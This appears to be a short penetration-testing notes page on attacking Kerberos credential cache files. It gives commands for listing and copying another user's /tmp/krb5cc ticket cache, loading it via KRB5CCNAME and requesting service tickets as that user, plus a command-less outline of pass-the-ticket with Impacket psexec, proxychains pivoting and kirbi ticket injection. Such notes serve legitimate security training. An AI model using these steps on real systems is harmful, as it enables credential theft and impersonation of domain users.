search

Kerberos Cache File

hashtag
Attacking Credential Cache Files

  • if have root access

  • can copy cache file

  • list cache files

ls -al /tmp/krb5cc_*

  • copy the file and change the ownership

sudo cp /tmp/krb5cc_607000500_3aeIA5 /tmp/krb5cc_minenow  
sudo chown kali:kali /tmp/krb5cc_minenow

  • To use this you must set the environment variable and destroy any old tickets

kdestroy  
klist  
export KRB5CCNAME=/tmp/krb5cc_minenow  
klist

  • tickets can now be requested on their behalf

kvno MSSQLSvc/DC01.test.domain:1433

  • klist to view the newly added ticket

hashtag
Moving the krb5 file to your kali box

Then

Verify

Then test access with impacket psexec

hashtag
Kerberos with Impacket

  • in order to perform ticket manipulation, we need to install the kerberos linux client utilities on the kali box

  • If you screw up the install or need to change something

    • sudo dpkg-reconfigure krb5-config

    • We’ll also have to copy the ccache file previously obtained to our local Kali box

  • Next we’ll have to update the environment variable on our local kali box

  • We’ll need to update the hosts file to map the hostnames to IP addresses

  • Also the source IP address will have to be correct so proxychains will need to be used

  • proxychains4.conf will need to comment out DNS

  • set up a socks server on the pivot host

  • now proxychains & impacket can be used to interact with the remote host

  • Gather a list of SPNs available

  • get a shell on the remote box

  • Renew

hashtag
Convert ccache to Kirbi

Convert ccache to kirbi

inject ticket on compromised host

PreviousSSHNextAnsible

Last updated